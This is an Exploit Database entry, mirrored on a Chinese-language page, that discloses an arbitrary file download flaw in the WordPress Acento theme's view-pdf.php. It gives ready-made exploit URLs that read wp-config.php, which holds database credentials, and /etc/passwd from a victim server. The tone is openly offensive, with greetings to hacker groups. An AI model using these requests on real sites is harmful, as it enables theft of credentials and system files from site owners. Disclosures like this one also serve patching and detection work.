WordPress Theme Acento – ‘view-pdf.php?File’ Arbitrary File Download

• Exploit Database
• 109 阅读

• 作者： alieye
  日期： 2014-09-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34578/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

  #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : WordPress acento theme Arbitrary File Download Vulnerability # Author : alieye # vondor : http://www.wpbyexample.com/detail/acentocultural.com # Contact : cseye_ut@yahoo.com # Risk : High # Class: Remote # Date: 01/09/2014 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++       You can download any file from your target ;)     exploit: http://victim.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php     Demo:   1-download wp-config.php file from site:   http://server/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/homepages/44/d398221315/htdocs/wp-config.php   2-download passwd file from root:   http://server/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/etc/passwd     #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++